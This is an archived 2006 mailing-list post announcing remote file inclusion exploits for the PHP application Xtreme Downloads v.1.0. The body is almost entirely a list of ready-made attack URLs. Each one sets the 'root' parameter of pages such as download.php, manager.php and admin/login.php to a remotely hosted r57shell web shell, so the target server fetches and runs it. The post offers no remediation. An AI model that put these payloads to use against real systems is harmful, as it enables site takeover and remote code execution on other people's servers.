|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Multiple file include exploits in Xtreme Downloads v.1.0
From: black code (black-cod3
hotmail.com)
Date: Mon Jun 05 2006 - 16:10:44 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Multiple file include exploits in Xtreme Downloads v.1.0
script type : Xtreme Downloads v.1.0
bug found by : sweet-devil & black-code
team : site-down
type : file include
####################################################
exploits :
download.php
http://www.example.com/path/download.php?root=http://yoursite/r57shell.txt?
manager.php
http://www.example.com/path/manager.php?root=http://yoursite/r57shell.txt?
/admin/scripts/category.php?
http://www.example.com/path/admin/scripts/category.php?root=http://yoursite/r57shell.txt?
/includes/add_allow.php?
http://www.example.com/path/includes/add_allow.php?root=http://yoursite/r57shell.txt?
/admin/index.php
http://www.example.com/path/admin/index.php?root=http://yoursite/r57shell.txt?
/admin/login.php
http://www.example.com/path/admin/admin/login.php?root=http://yoursite/r57shell.txt?
####################################################
#######################
emails:
gamr-14hotmail.com & black-cod3hotmail.com
#######################
All my respect to our friends , lezr.com , g123g.net
done .. peace
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]